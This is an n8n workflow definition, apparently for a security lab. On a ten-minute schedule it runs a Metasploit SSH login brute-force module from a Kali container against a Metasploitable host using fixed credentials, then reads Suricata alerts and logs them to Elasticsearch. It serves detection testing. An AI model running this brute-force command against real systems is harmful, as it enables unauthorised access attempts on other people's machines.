n8n/workflows/n8n_workflows_brute_force_workflow.json
{
  "name": "Brute Force Attack with Suricata Detection",
  "nodes": [
    {
      "parameters": {
        "cronExpression": "0 */10 * * * *"
      },
      "name": "Cron Trigger",
      "type": "n8n-nodes-base.cron",
      "typeVersion": 1,
      "position": [240, 300]
    },
    {
      "parameters": {
        "command": "docker exec kali msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_login; set RHOSTS metasploitable; set USERNAME admin; set PASSWORD password; run; exit'"
      },
      "name": "Execute Metasploit Brute Force",
      "type": "n8n-nodes-base.executeCommand",
      "typeVersion": 1,
      "position": [460, 300]
    },
    {
      "parameters": {
        "command": "cat /var/log/suricata/fast.log"
      },
      "name": "Check Suricata Alerts",
      "type": "n8n-nodes-base.executeCommand",
      "typeVersion": 1,
      "position": [680, 300]
    },
    {
      "parameters": {
        "httpMethod": "POST",
        "url": "http://elasticsearch:9200/suricata_logs/_doc",
        "options": {},
        "bodyParameters": {
          "parameters": [
            {
              "name": "alert_data",
              "value": "={{$node['Check Suricata Alerts'].json.stdout}}"
            }
          ]
        }
      },
      "name": "Log to Elasticsearch",
      "type": "n8n-nodes-base.httpRequest",
      "typeVersion": 1,
      "position": [900, 300]
    }
  ],
  "connections": {
    "Cron Trigger": {
      "main": [
        [
          {
            "node": "Execute Metasploit Brute Force",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Execute Metasploit Brute Force": {
      "main": [
        [
          {
            "node": "Check Suricata Alerts",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Check Suricata Alerts": {
      "main": [
        [
          {
            "node": "Log to Elasticsearch",
            "type": "main",
            "index": 0
          }
        ]
      ]
    }
  }
}